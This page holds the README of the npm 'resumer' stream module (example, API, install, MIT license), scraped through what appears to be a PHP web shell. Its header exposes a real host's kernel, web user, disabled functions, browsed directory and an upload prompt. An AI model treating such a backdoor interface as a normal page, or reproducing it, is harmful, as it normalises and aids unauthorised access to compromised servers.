![]() System : Linux absol.cf 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64 User : www-data ( 33) PHP Version : 7.4.33 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Directory : /usr/local/lib/node_modules/forever/node_modules/resumer/ |
Upload File : |
# resumer Return a through stream that starts out paused and resumes on the next tick, unless somebody called `.pause()`. This module has the same signature as [through](https://npmjs.com/package/through). [](http://ci.testling.com/substack/resumer) [](http://travis-ci.org/substack/resumer) # example ``` js var resumer = require('resumer'); var s = createStream(); s.pipe(process.stdout); function createStream () { var stream = resumer(); stream.queue('beep boop\n'); return stream; } ``` ``` $ node example/resume.js beep boop ``` # methods ``` js var resumer = require('resumer') ``` ## resumer(write, end) Return a new through stream from `write` and `end`, which default to pass-through `.queue()` functions if not specified. The stream starts out paused and will be resumed on the next tick unless you call `.pause()` first. `write` and `end` get passed directly through to [through](https://npmjs.com/package/through). # install With [npm](https://npmjs.org) do: ``` npm install resumer ``` # license MIT